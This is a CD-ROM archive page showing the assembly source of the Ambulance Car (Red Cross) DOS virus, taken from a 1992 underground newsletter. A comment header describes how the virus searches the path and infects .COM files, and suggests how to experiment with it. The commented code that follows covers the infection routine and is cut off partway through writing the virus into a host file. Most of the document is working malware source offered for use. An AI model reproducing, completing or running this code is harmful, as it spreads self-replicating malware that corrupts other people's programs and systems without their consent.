home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
AMBUL.ASM
< prev
next >
Wrap
Assembly Source File
|
1992-12-03
|
23KB
|
524 lines
;REDCROSS/AMBULANCE CAR VIRUS for Crypt Newsletter #10, edited by Urnst Kouch
;December 1992
;Originally supplied as a Sourcer disassembly in a Scandinavian virus mag
;published by "Youth Against McAfee (YAM)", this AMBULANCE specimen was
;generated in its raw form by "Natas Kaupas." Hold that up to your mirror
;and it spells Satan. Whatever, "Natas/Satan" has also supplied us with the
;MINDLESS/FamR series of viruses for you trivia buffs. The Crypt Newsletter
;is obliged to him, wherever he is, for these interesting programs.
;
;In any case, while helpful, the original disassembly had diminished
;value, being completely uncommented. It did, however, assemble
;under TASM into an actual working copy of the virus, which
;appears to be the AMBULANCE CAR B strain.
;
;
;Ambulance Car remains an interesting virus, packed with enough features
;so that it can still find its target files, .COM executables, wherever
;they might be lurking on a system.
;
;Principally, this revolves around the virus searching the path string set
;in the environment. If no path exists, the virus defaults to the
;current directory. In both cases, the virus may infect up to two files
;anywhere on the path per pass. Most times it will infect only one.
;Sometimes it will not budge at all.
;
;Once it's found a file, Ambulance checks it for the 0E9h byte at
;the beginning. If it doesn't find it, the virus assumes the file is
;uninfected and immediately tries to complete the infection. If
;it does find the byte, it continues reading from there to confirm
;the viral sequence. If this is a coincidence and the complete sequence
;is not there, the virus will infect the file anyway.
;
;Randomly, the virus will activate and run the Ambulance across the bottom
;of your screen after a round of infection. Because of the path search
;Ambulance can easily find .COM executables on a sizeable disk at a time
;when there are less and less of these to be seen. Unfortunately, for a
;direct-action virus, the disk activity is noticeable with the caveats:
;on a fast machine, perhaps not; or in front of an average user, perhaps not.
;You never know how a user will react when dealing with viruses.
;
;You can easily experiment with this version on your machine by commenting
;out the path statement in your AUTOEXEC.BAT. This will restrict the
;virus to a test directory where it can be used to infect bait files
;until the Ambulance effect is seen.
;
;Ambulance Car is detected by "rules-based" anti-virus sentries like
;PCRx (reviewed in this issue), but keep in mind this type of
;protection is not flawless. Accidents can happen. Most current scanners
;easily detect this variant of Ambulance, although
;some cannot disinfect files once they are parasitized.
data_1e equ 0Ch
data_2e equ 49h
data_3e equ 6Ch
psp_envirn_seg equ 2Ch
data_21e equ 0C80h
virus segment byte public
assume cs:virus, ds:virus
org 100h
redcross proc far ;main flow control procedure for Ambulance
;Car virus
start:
jmp short virstart
data_5 dw 4890h ; Data table
data_7 dw 6C65h ; Data table
db 6Ch, 6Fh, 20h, 2Dh, 20h
copyright db 'Copyright S & S Enterprises, 198';whoah, how'd Solomon's
db '8' ;stamp get in here? ;-]
db 0Ah, 0Dh, 24h, 1Ah,0B4h, 09h
db 0BAh, 03h, 01h,0CDh, 21h,0CDh
db 20h
virstart:
db 0E8h, 01h, 00h
add [bp-7Fh],bx
out dx,al ; port 0, channel 0
add ax,[bx+di]
call check_infect ; do path search, infect file
call check_infect ; ditto, sometimes, sometimes not
call sound_fury ; do we do AMBULANCE effect? Check!
lea bx,[si+419h]
mov di,100h
mov al,[bx]
mov [di],al
mov ax,[bx+1]
mov [di+1],ax
jmp di ; Register jump
exit:
retn ; handoff to host
redcross endp
;*****************************************************************************
; SUBROUTINE
;*****************************************************************************
check_infect proc near ; path search for Ambulance
call loadpath ; Car
mov al,byte ptr data_19[si]
or al,al
jz exit ; No path/no files? Git!
lea bx,[si+40Fh]
inc word ptr [bx]
lea dx,[si+428h] ; load effective address
mov ax,3D02h
int 21h ; open found file by loadpath read/write
; with handle
mov word ptr ds:[417h][si],ax ;ax contains handle
mov bx,word ptr ds:[417h][si]
mov cx,3
lea dx,[si+414h] ; load address of buffer
mov ah,3Fh ; to read first three bytes into.
int 21h ; Read the bytes . . .
; bx points to file handle.
;
mov al,byte ptr ds:[414h][si]
cmp al,0E9h ; compare with 0E9h
jne infect ; if not equal, assume virus not here - infect
mov dx,word ptr ds:[415h][si]
mov bx,word ptr ds:[417h][si]
add dx,3
xor cx,cx ; zero register
mov ax,4200h
int 21h ; point to beginning of file, again
; bx contains the handle
mov bx,word ptr ds:[417h][si]
mov cx,6
lea dx,[si+41Ch] ; load effective address
mov ah,3Fh ; and read the first 6 bytes
int 21h ; this time
; ds:dx points to buffer
mov ax,data_13[si]
mov bx,data_14[si]
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; compare with data copied above
jne infect ; jump if not equal to infect
cmp bx,data_5[si]
jne infect ; jump if not equal
cmp cx,data_7[si]
je close ; finally, if we get a match we know
infect: ; we're here, so go to close up
mov bx,word ptr ds:[417h][si]
xor cx,cx ; zero register
xor dx,dx ; zero register
mov ax,4202h
int 21h ; reset pointer to end of file
; bx contains file handle
sub ax,3
mov word ptr ds:[412h][si],ax
mov bx,word ptr ds:[417h][si]
mov ax,5700h ; bx points to name of file
int 21h ; get file date and time
; time returns in cx, date in dx
push cx ; push these onto the stack
push dx ; we'll need 'em later
mov bx,word ptr ds:[417h][si]
mov cx,319h
lea dx,[si+100h]
mov ah,40h ; write th